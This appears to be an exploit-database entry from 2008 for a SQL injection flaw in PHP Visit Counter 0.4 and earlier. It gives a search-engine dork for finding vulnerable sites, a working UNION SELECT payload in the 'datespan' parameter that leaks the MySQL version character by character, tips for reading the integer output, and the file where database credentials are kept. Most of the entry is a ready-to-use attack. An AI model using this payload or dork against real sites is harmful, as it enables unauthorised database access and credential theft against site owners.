PHP Visit Counter <= 0.4 (datespan) SQL Injection Vulnerability

2008-05-31T00:00:00
ID 1337DAY-ID-3091
Type zdt
Reporter Lidloses_Auge
Modified 2008-05-31T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ===============================================================
PHP Visit Counter <= 0.4 (datespan) SQL Injection Vulnerability
===============================================================



###############################################################
#
#           PHP Visit Counter <= 0.4 - SQL Injection Vulnerability
#                                                             
#      Vulnerability discovered by: Lidloses_Auge             
#      Greetz to:                   -=Player=- , Suicide, g4ms3, enco,
#                                        GPM, Free-Hack, Ciphercrew
#      Date:                        30.05.2008
#
###############################################################
#                                                             
#      Dork:  inurl:"read.php?datespan="
#
#      Vulnerability:
#
#      1.) SQL Injection
#
#         1.1.) [Target]/read.php?action=read&cat=portal&datespan=null+group+by+null+union+select+1,2,ascii(substring(version(),1,1))/*
#
#      Notes:
#
#         Output is displayed as INT, so you've to convert it into ascii and
#         scan every single letter to get the whole name.
#         MySQL Data is stored in [Counterpath]/variables.php
#
###############################################################




#  0day.today [2018-02-09]  #